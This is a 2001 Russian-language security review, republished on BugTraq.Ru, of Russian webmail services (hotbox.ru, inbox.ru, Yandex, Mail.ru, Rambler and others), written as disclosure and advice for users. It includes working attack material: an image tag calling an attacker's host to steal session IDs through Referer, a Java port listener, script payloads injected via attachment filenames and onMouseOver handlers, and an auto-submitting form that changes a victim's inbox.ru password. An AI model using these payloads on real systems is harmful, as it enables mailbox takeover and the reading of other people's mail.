BugTraq.Ru
Русский BugTraq
https://bugtraq.ru/library/www/testmail.html

Субъективная оценка российских удалённых почтовых сервисов. Тестирование на ошибки в Веб-интерфейсе.
A.V.Komlin
Опубликовано: dl, 25.11.01 22:25

Комментарий bugtraq.ru:
Описанное в статье тестирование было проведено в начале 2001 года. В настоящее время выявленные проблемы, как правило, уже благополучно исправлены, однако их описание до сих пор может быть полезно для разработчиков web-приложений - всегда лучше учиться на чужих ошибках...



      Уважаемые читатели, в этой статье мне хотелось бы поделиться с Вами впечатлениями о работе конкретных удалённых почтовых служб с точки зрения безопасности и конфиденциальности. Надеюсь это поможет Вам правильно выбрать услугу. В обзоре кратко коснусь истории ошибок рассматриваемого почтового сервиса, и укажу некоторые результаты последнего (07.02.2001) тестирования на безопасность WWW-интерфейсов российских почтовых служб, при работе с современными браузерами , настроенными по умолчанию, что соответствует 99% случаев. Конечно, большинство ошибок будут устранены, многие вообще не коснуться работающих стандартными методами ( через почтовые протоколы POP3& IMAP &SMTP), но общее впечатление о политике и уровне безопасности Вы сможете составить. К сожалению о скорости работы могу сказать неточно, т. к. в дневное для москвичей (основных пользователей Рунета) время, уже сплю:
      Немного истории: прошёл год с публикации статьи о безопасности веб-интерфейса. Там была высказана спорная мысль, что безопасный WWW-интерфейс для чтения почты создать почти невозможно, без существенного снижения качества письма, т.к. браузеры изначально не расчитаны на подобные функции,а регулярно появляющиеся новые возможности делают малоэффективной фильтрацию. Очень многие не согласились с этим, но до сих пор все крупнейшие сервисы страдают от всё новых и новых ошибок. Даже в такой уважаемой службе, как hotmail.com очередной баг был выявлен всего пол-месяца назад...

Забегая вперёд: сводные результаты тестирования
      Ни одна из расмотренных служб не была безопасной при стандартных настройках браузеров, предоставляя атакующему возможность, слегка помучившись, отобрать аккаунт . Для безопасной работы придётся как минимум отключить поддержку сценариев (Javascript), а иногда не спасёт и это.

Из российских почтовых служб наиболее известными (автору :) ) являются : Mail.ru, FreeMail.ru ( km.ru) , newmail.ru (hotmail.ru, nm.ru) (временно прекратил регистрацию пользователей и свежих тестов нет) , mail.rambler.ru , mail.yandex.ru (narod.ru) , inbox.ru .
      Особняком стоит hotbox.ru ( pochtamt.ru, pisem.net, mailru.com, krovatka.net, rbcmail.ru.) - единственный известный российский сервис, поддерживающий защищённые соединения и гарантирующий полную конфиденциальность. Теоретически - этот сервер должен (был) служить эталоном безопасности, поэтому с него и начнём.

Дополнение от 14.02.01
      По просьбам читателей и в соответствии с пожеланием Ленты.ru дополнил обзор исследованием zmail.ru (@zmail.ru, @id.ru, @go.ru, @ok.ru, @ru.ru и @quake.ru) и новым сервисом 360.ru с поддержкой защищённых 128-битным шифрованием соединений.

HOTBOX.RU
Заявленные возможности.
      Как уже упоминалось, это единственный сервис, поддерживающий защищённые соединения, и изначально ориентированный на конфиденциальность. Кстати по заявленным возможностям -он самый функционльный из аналогичных служб.
      Размер почтового ящика -20 Mb!
      Возможность работы по WWW- интерфейсу в защищённом и обычном режимах.
      Поддерживает стандартные протоколы POP3, IMAP (!) и SMTP c поддержкой SSL.
      Поддерживает пересылку .
      Поддерживает фильтрацию.
      Встроенной антивирусной проверки нет.
      Большой выбор доменов: hotbox.ru, pochtamt.ru, pisem.net, mailru.com, krovatka.net, rbcmail.ru.
История:

      При заходе на сервер Вы можете прочитать:

                             От прочих сервисов нас отличают:
                              Абсолютная конфиденциальность - мы
                              предоставляем возможность использовать
                              защищенный режим, в котором вся
                              пользовательская информация шифруется.
                              Высокая надежность - наш опыт работы
                              (сайт открылся более года назад) и наши
                              пользователи (а их более 400 тыс.) служат
                              тому подтверждением.


Безопасность.

    Первые впечатления от посещения службы оставили доброе впечатление: отличный набор возможностей, можно нормально работать без Javascript, во время работы пользователь идентифицируется по случайному многозначному идентификатору, почти все опасные настройки (кроме пересылки) защищены паролями, а включение форвардинга требует подтверждения от конечного адреса, что позволяет избежать случайной ошибки.
      Небольшая очевидная ошибка выявилась только при регистрации: предлагались нестойкие секретные вопросы типа "Девичья фамилия матери" ( впрочем, это общая болезнь, да и пользователю самому думать головой надо.)
      В общем, на минуту показалось, что вот он - идеальный ресурс. Увы только на одну минуту.
      Первое же тестирование выявило, что сервер подвержен простейшим ошибкам в фильтрации скриптов и других опасных тегов, но это оказалось не самым худшим.
      Как уже было отмечено - во время работы пользователь идентифицируется по случайному многозначному идентификатору (id) , и разумеется (думал я) IP и/или cookies. Тест показал, что это не так! Узнав значение id на ящик оказалось возможным зайти с другого адреса, например после обрыва соединения! Более того не требовалось и поддержки "пирожков" (хотя узнать их при возможности выполнить скрипт проблемой не являлось).
      Фактически, для несанкционированного просмотра ящика, достаточно себе поставить простейшую программу, регистрирующую обращения к 80-му (или другому указанному в адресе) порту, послать письмо, вставив в него нефильтруемый тег провоцирующий браузер на автоматическое обращение к машине атакующего (например с помощью ссылки на картинку, якобы расположенную на IP адресе взломщика < img src=http://адрес_машины_взломщика:порт/anyname.gif width=1 height=1 >) и, дождавшись пока жертва зайдёт читать почту, посмотреть поле "Referer:" в заголовке пришедшего запроса!
----------
GET /anyname.gif HTTP/1.0
Referer: http://www.hotbox.ru/message.php?id=b04b13da32e6345bc2b9bc72f19014cf&index=6&array_index=5
Connection: Keep-Alive
...
--------
Пример java-утилиты для прослушивания порта.
type sserv.java
--------
import java.io.*;
import java.net.*;
import java.util.*;

public class sserv {
 public static void main(String args[])
   {
   ServerSocket ss;
   Socket s;
   InputStream is;
   try {
	ss = new ServerSocket(80); // Номер слушаемого порта.
	s = ss.accept();
        is = s.getInputStream();
	byte buf[] = new byte[512];
        int lenght = is.read(buf);
        System.out.write(buf,0,lenght);
        is.close();
   } catch(Exception ioe) { System.out.println(ioe.toString()); }    
  }  // end main
} //end sserv
-------
: javac ssev.java
: java sserv

      Атакующему осталось только отключить поддержку cookies в своём браузере, полностью набрать указанный в Referer адрес и параллельно "работать с почтой " (почитать письма ,установить пересылку...) пока хозяин не выйдет из неё.
      Если злоумышленник не имеет постоянного соединения с сетью, он может воспользоваться дырками в фильтрации тегов, чтобы установить с помощью языков сценариев пересылку ( для этого придётся отправить дополнительное письмо с кодом подтверждения).

Примеры ошибок фильтрации:
     Не фильтруются теги в именах присоединённых файлов
Content-Type: text/html; charset=us-ascii;
 name="test.html"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="te < script >  ... location.href=location.href.replace("index","actionID=1&index");   < /script > st.html"

      Приведённый пример автоматически удалит пришедшее "заражённое" письмо после выполнения каких-то действий.
     Не фильтруются также обработчики событий, например:
     < img src="about:any" height=1600 width=1600 onMouseOver=' любой код для эксплойта; return true;'>,
      Скрипты, записанные в эти поля выполнятся сразу после открытия письма или первого движения мыши в письме. Есть и другие дырки :
     Окончательным свидетельством небрежного подхода разработчиков к Веб-интерфейсу стало хранение данных в cookies: при включённой опции "запомнить пароль" - последний сохраняется в виде plain text бeз какой-либо шифровки вместе с логином!

Итог.
      В принципе, идеи заложены хорошие, подвели неакуратность и стремление сделать работу поудобнее. Если не пользоваться веб-интерфейсом, работая по защищённым почтовым протоколам ч/з Outlook Express (что и делает автор), то безопасность будет существенно выше чем у конкурентов. Конечно, при условии, что остальные возможности не реализованны так же "аккуратно".

Inbox.ru
Заявленные возможности.
      Размер почтового ящика -2 Mb.
      Возможность работы по WWW- интерфейсу.
      Поддерживает стандартные протоколы POP3 и SMTP для работы с почтовыми программами
      Поддерживает пересылку
      Поддерживает фильтрацию.
      Встроенной антивирусной проверки нет.
      Защищённых соединений, увы, не поддерживает.
История:

      Сервис появился в 1998 году, основан на модифицированном ПО разработанном mail.ru.
Безопасность: очевидные недостатки:

      Смена пароля и установка пересылок никак не защищены ( подтверждения паролем не требует, место отсылки формы не проверяется). Пропускает скрипты в имени присоединённых файлов ( кроме .htm-вских), что делает отбор ящика элементарным . Ниже дан пример простейшего эксплойта (без маскировки), меняющего пароль при открытии письма ( более подробно о применяемый приёмах можно прочитать в старой статье.
      Размещаете на веб-страничке любого общедоступного сервиса файл отредактированный файл editprofil.html (приведённый ниже). В отсылаемом письме редактируете строку, содержащую имя присоединного файла (содержание письма особой роли не играет, аттач не должен иметь расширение htm, html или txt), как показано ниже.
Content-Type: image/gif; charset=us-ascii;
name="test.gif"
Content-Transfer-Encoding: base64
Content-Disposition: inline;
filename="te < script > locaton.href="http://ДОМЕН/editprofil.html"); < /script > st.gif"

editprofil.html ( не забудьте отредактировать ДОМЕН, ИМЯ_ПОЛЬЗОВАТЕЛЯ и
НОВЫЙ_ПАРОЛЬ)
--------------------------------------------------------------------
<html>
<body>

<form method=post action="http://win.inbox.ru/cgi-bin/modifyuser?modify">
<input type="hidden" name="Username" value=" ИМЯ_ПОЛЬЗОВАТЕЛЯ ">
<input type="text" name="RealName" value="A. V. Komlni">
<input type="text" name="Forward" value="">
<input type="password" name="Password" value=" НОВЫЙ_ПАРОЛЬ ">
<input type="password" name="Password_Verify" value=" НОВЫЙ_ПАРОЛЬ ">
<input type=checkbox name="Flags.DoNotKeepMail" >
Не сохранять почту при пересылке<br>
<input type="submit" value="Сохранить"> <input type="reset"
value="Восстановить">
</form>

<SCRIPT LANGUAGE="JavaScript">
 document.forms[0].submit();
</script>
</body>
</html>
Неочевидные недостатки:
      Требует лично заходить на сервер не реже, чем раз в пол-года, иначе ящик будет отключён и его сможет захватить кто угодно.
Безопасность: достоинства.

Возможность нормальной работы без поддержки Javascript.

Итог.
      Веб- интерфейсом лучше не пользоваться до его доработки и смены отношения к безопасности или отключать поддержку сценариев (Javascript) перед просмотром писем и не открывать ссылок в письме.

Yandex.ru (narod.ru)
Заявленные возможности.
      Размер почтового ящика - 5 Mb.
      Возможность работы по WWW- интерфейсу.
      Поддерживает стандартные протоколы POP3 и SMTP
      Поддерживает пересылку
      Поддерживает фильтрацию.
      Встроенной антивирусной проверки нет.
      Защищённых соединений, увы, не поддерживает.
      IMHO Работает довольно быстро.
История:

      Эта служба была запущена относительно недавно - в конце 2000 года, но уже послужила причиной нескольких публикаций на RSN Forum'e, посвящённых грубым ошибкам в её системе безопасности: А. Большаковым была выявлена плохая фильтрация тегов "script" поле Subject и имени присоединённых файлов. Вместе с никак незащищённой схемой смены пароля это позволило силами посетителей RSN Forum'a написать простой эксплойт, захватывающий почтовый ящик пользователя при простом открытии письма. Службе поддержки yandex.ru потребовалось всего несколько дней, чтобы устранить ошибки с конкретными полями и тегами, но, увы, механизм смены пароля серьёзных изменений не претерпел, что позволяет успешно повторить попытку при обнаружении новых ошибок в фильтрации.
Безопасность: очевидные недостатки:

      1) При регистрации предлагает нестойкие секретные вопросы ( общая болезнь).
      2) Нормальная работа сервиса невозможна без включённой поддержки Javascript, а механизм смены пароля никак не защищён, что позволяет при наличии дырки в фильтрации скриптов сменить пароль при открытии письма.
      Найти новую дырку оказалось нетрудно. Не фильтруются обработчики событий, поэтому при подстановке в тело письма ссылки на рисунок вида < img src="about:any" height=1600 width=1600 onMouseOver=' любой код для эксплойта; return true;'>, можно выполнить любой код эксплойта. Подстановка впереди тега < div style="position:absolute;top:0;left:0;background-color:#FFFFFF;padding:8px" > , позволит сразу занять весь экран, чтобы не ждать, пока жертва двинет мышкой. Для захвата ящика после небольшой модификации подойдёт старый эксплойт.
Неочевидные недостатки:
      Не смотрел: вполне достаточно очевидных. :)
Безопасность: достоинства.
Можно включить пересылку или работать по POP3 /SMTP забыв о веб-интерфейсе.

Итог.
      Веб- интерфейсом вообще лучше не пользоваться до коренной его переработки и смены политики безопасности. Сервер быстрый и удобный, ничто не мешает вам воспользоваться стандартными методами работы с почтой.

MAIL.RU
      Самый популярный российский почтовый сервис (и один из старейших). Короткое и очевидное имя сервиса. (Конечно, все простые имена пользователей давно расхватаны). Мощная служба поддержки
Заявленные возможности.
      Размер почтового ящика -2 Mb. Ожидается увеличение.
      Возможность работы по WWW- интерфейсу.
      Поддерживает стандартные протоколы POP3 и SMTP
      Поддерживает пересылку ( до трёх адресов).
      Поддерживает фильтрацию.
      Встроенной антивирусной проверки нет.
      Защищённых соединений, увы, не поддерживает.
      Работает довольно медленно.
История:
      Изначально, отношение к политике безопасности было крайне неудовлетворительным. Результат не заставил себя ждать: за 1999, 2000 годы в нём были обнаружены десятки ошибок, включая возможности кражи списков почтовых адресов, отбора почтовых ящиков , чёрный ход, оставленный одним из программистов, позволяющий узнать пароль и отобрать или прослушивать почтовый ящик, и наконец, сам сервер был ненадолго взломан. Последняя широко опубликованная ошибка в WWW-интерфейсе была обнаружена в январе 2001 года.
      К счастью, болезненные уроки пошли впрок и на сегодня известные серьёзные баги убраны, а роль безопасности пересматривается. Надо отдать должное службе поддержки которая работает очень оперативно устраняя ошибки даже в праздничные дни.
Безопасность: очевидные недостатки:
      Защищённых соединений ,увы, не поддерживает. При регистрации предлагает нестойкие секретные вопросы ( общая болезнь).
Неочевидные недостатки:
      Несмотря на то, что при попытке изменить настройки требуется ввести старый пароль, при открытии формы "Личные данные" открытым текстом высвечиваются секретный вопрос и ответ на него, что делает возможным их похищение при включённом Javascript( например методом "поддельной открытки" ), с полным доступом к ящику в итоге.
      Требует лично заходить на сервер не реже, чем раз в пол-года, иначе ящик будет отключён и его сможет захватить кто угодно.
      Единственная выявленная возможность несанкционированно выполнить скрипт является не просчётом программистов, а ошибкой некоторых версий IE , позволяющей некорректному серверу вместо рисунка подставить HTML-код.

...
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit

< script > ... < /script >
 

Безопасность: достоинства.
      Возможность работы без поддержки Javascript.
      Регистрация последнего доступа к ящику.
      Явное сообщение на первой странице о включённой пересылке.

Итог.
      Долгие издевательства над сервером, привели к существенному росту уровня безопасности и пересмотру методов её реализаии. На сегодня ошибки могут в основном подстерегать Вас в WWW- интерфейсе, но возможность работы без языков сценариев, позволяет свести этот риск к минимуму, если Вы настроите браузеры или перед работой будете отключать Javascript ( в Oper'a и Netscape).
      В общем, если Вам не нужна секретность (конфиденциальность) или Вы планируете обеспечить её шифровкой самих писем, Mail.Ru - хороший выбор. Чтобы не рисковать и не страдать от медленной работы и маленького ящика - используйте переадресацию. Изредка, заходите, проверяйте не заглядывает ли кто посторонний ( по времени последнего доступа).
      Работая с Веб-почтой никогда не открывайте сразу ссылки, приведённые в письме. Это чревато кражей секретного вопроса и ответа. Скопируйте ссылку в буфер (правой кнопкой мыши), выйдите из почты соответствующей кнопкой и только после этого откройте в новом окне браузера ссылку. Долго ? Зато безопасно. Как альтернативный вариант, перед чтением писем можно отключать Javascript ( Активные сценарии), и Яву.

freemail.ru (km.ru)
Заявленные возможности.
      Короткое имя сервиса. (Конечно, все простые имена пользователей давно расхватаны.)
      Предоставляет 5Mb места,
      Возможность работы по WWW- интерфейсу,
      Стандартные протоколы POP3 и SMTP
      Пересылку не поддерживает.
      Фильтрации нет.
      Встроенная антивирусная проверка есть.
      Защищённых соединений ,увы, не поддерживает.
Безопасность: очевидные недостатки:
      Восстановление пароля производится только по резервному e-mail. Грамотный секретный вопрос был бы лучше.
      Изменение настройки производится свободно, подтверждения не требует, место отсылки формы не проверяется: очень опасное решение! От элементарного отбора адресов спасает только полная фильтрация тегов, приводящая к ухудшению качества приходящего письма и возможность работы без активных сценариев, но с учётом отсуствия проверки содержимого вложений, описанных как рисунки, те кто смотрит почту с веб-интерфейса через MS IE могут лишиться её даже при попытке открыть вложенный рисунок ( а открывать их приходится, т.к. сама служба этого не делает из-за блокировки тегов). Вполне применим и метод "поддельной открытки".
Достоинства.
      Возможность работы без поддержки Javascript. Всеобщая фильтрация тегов - достаточно кардинальное, хотя и неудобное решение проблемы с несанкционированными скриптами. Осталось только вложенные файлы проверять!
Итог.
      Веб- интерфейсом вообще лучше не пользоваться до его доработки. Отсутствие пересылки сильно снижает полезность сервиса. Отсуствие секретного вопроса затрудняет возможность возврата украденого логина.

Newmail.ru (hotmail.ru, nm.ru)
      К сожалению, этот сервис прекратил регистрацию новых пользователей и нормально протестировать его нет возможности.
Заявленные возможности.
      Предоставляет до трёх адресов на один ящик.
      Размер почтового ящика -10 Mb.
      Возможность работы по WWW- интерфейсу.
      Поддерживает стандартный протокол POP3 для приёма почты.
      Поддерживает пересылку .
      Поддерживает фильтрацию.
      Встроенной антивирусной проверки нет.
      Защищённых соединений, увы, не поддерживает.
История:

      Сервис существует около двух лет. Последний раз автор проверял его больше года назад. Потом забыл зайти подтвердить регистрацию и аккаунт был удалён. Впечатления о себе оставил неплохие, но полностью "поддерживал" основные ошибки.
Безопасность: очевидные недостатки:

      При регистрации предлагает опасные секретные вопросы ( общая болезнь).
Данные годичной давности.
      Смена настроек не была защищена паролем. Пропускались теги сценариев в обработчиках событий (OnMouseOver, OnMouseMove) основных тегов, что открывало перспективы лёгкого отбора ящиков, способом, аналогичным описанному для inbox.ru.
Неочевидные недостатки:
      Требует лично заходить на сервер не реже, чем раз в пол-года, иначе ящик будет отключён и его сможет захватить кто угодно.
Безопасность: достоинства.
Появился способ захода с возможность работы без поддержки Javascript ( хороший признак). Логин для управленния аккаунтов может не совпадать с именем ящика ( очень полезная идея).

Итог.
      В принципе, о безопасности думали, времени прошло немало, может и улучшили что-то. Впрочем, пока регистрации нет и ошибки сервиса малоактуальны. Если у кого-то есть рабочий ящик может разрешите протестировать?

Rambler.ru
Заявленные возможности.
      Размер почтового ящика -5 Mb.
      Возможность работы по WWW- интерфейсу.
      Увы, не поддерживает стандартные протоколы для работы с почтовыми программами!
      Поддерживает пересылку (хотя и путём ухищрений)
      Поддерживает фильтрацию.
      Встроенной антивирусной проверки нет.
      Защищённых соединений, увы, не поддерживает.
История:

      Сервис появился недавно и фактически ограничен Веб-интерфейсом.
Безопасность: очевидные недостатки:

      Установка пересылок и извещений на пейджер никак не защищена. Установка пересылок через фильтр тоже. Увы, опять пропущены скрипты в обработчиках событий основных тегов, что делает организацию прослушивания ящиков достаточно простой задачей. Приёмы аналогичны применяемым для inbox.ru. Неочевидные недостатки:
      Требует лично заходить на сервер не реже, чем раз в пол-года, иначе ящик будет отключён и его сможет захватить кто угодно.
Безопасность: достоинства.

Возможность нормальной работы без поддержки Javascript. Возможность полного запрета тегов HTML в письме.

Итог.
      При дополнительной настойке браузера и самой почты это сервис не опаснее других. За это приходится платить качеством.

zmail.ru
Заявленные возможности.
      Размер почтового ящика -3 Mb.
      Возможность работы по WWW- интерфейсу.
      Поддерживает стандартные протоколы (POP3, SMTP(платно), IMAP для работы с почтовыми программами (платно).
      Поддерживает пересылку (платно)
      Поддерживает фильтрацию.
      Большой выбор доменных имён (@zmail.ru, @id.ru, @go.ru, @ok.ru, @ru.ru и @quake.ru) .
      Встроенной антивирусной проверки нет.
      Защищённых соединений, увы, не поддерживает.
История:

      Вообще-то zmail.ru -фактически платный сервис (доступен только веб-интерфейс, все остальные возможности необходимые для работы предоставляются за дополнительную оплату), и не совсем подходит под тематику данного обзора. Попал он сюда как наглядный пример, того, что за дополнительные деньги иногда приобретаются дополнительные уязвимости.
Безопасность: очевидные недостатки:

      При регистрации предлагает опасные секретные вопросы ( общая болезнь).
      Сервис также пропускает сценарии в обработчиках событий и теги таблицы стилей
< div style="position:absolute;top:0;left:0;background-color:#FFFFFF;padding:8px">
< img src="pl" height=1600 width=1600 OnMouseOver='alert(window.location); return null;'>
тем не менее, отобрать ящик непросто, т.к. установка нового пароля и резервного адреса требует знания старого пароля. Зато можно его незаметно заблокировать т.к. фильтры устанавливаются свободно.
     Куда большая неприятность ждёт платных пользователей - им разрешена пересылка, которую можно незаметно установить через систему фильтров и свободнно прослушивать почту!
Безопасность: достоинства.

      Возможность нормальной работы без поддержки Javascript. Смена пароля защищена владельцем. Идентификация по уникальному номеру сессии и ключу. В общем неплохие начинания, но ещё много недоработок.

Итог.
      В Бесплтном варинте - сервис с небольшими возможностями и ошибками. За дополнительную плату- дополнительные дырки :) ! Как всегда, активные сценарии (Javascript , VBScript) лучше отключить сразу. В общем неплохие начинания, но ещё много недоработок.

360.ru
Заявленные возможности.
      Размер почтового ящика -5 Mb.
      Возможность работы по WWW- интерфейсу.
      Поддерживает стандартные протоколы для работы с почтовыми программами!
      Не поддерживает пересылку.
      Не поддерживает фильтрацию.
      Встроенной антивирусной проверки нет.
      Поддержка защищённых соединений.
История:

      Сервис появился недавно и ещё не особо известен, но поддержка защищённых соединений заставила автора рассмотреть его поближе. Увы, никакой уровень шифрования не спасает веб-интерфейс при от небрежной реализации. Сервис "поддерживает" все стандартные ошибки.

Безопасность: очевидные недостатки:

      Изменение настроек, ничем не защищено. Вдобавок, пропускаются сценарии в обработчиках событий и теги таблицы стилей
< div style="position:absolute;top:0;left:0;background-color:#FFFFFF;padding:8px">
< img src="pl" height=1600 width=1600 OnMouseOver='alert(window.location); return null;'> ,
что делает отбор ящика элементарной процедурой ( методика, аналогична применяемой для inbox.ru ).

Безопасность: достоинства.

      Поддержка защищённых соединений.

Итог.
      Веб- интерфейсом вообще лучше не пользоваться до коренной его переработки и смены политики безопасности. Сервер пока быстрый, к тому же поддерживает защищённые соединения и ничто не мешает Вам воспользоваться стандартными методами работы с почтой.

    Пока всё. Надеюсь, приведённая здесь информация помогла Вам сделать выбор.


      Данная статья появилась, как побочный продукт разрабатываемого совместно c 911.ru проекта "Безопасные настройки", черновой вариант (макет) которого Вы можете увидеть здесь и, если будет желание, прислать свои комментарии и замечания на мой почтовый ящик.

    Спасибо за внимание.
              Искренне Ваш    A.V. Komlin

обсудить  |  все отзывы (0)

[37050; 21; 8.28]




  Copyright © 2001-2024 Dmitry Leonov Design: Vadim Derkach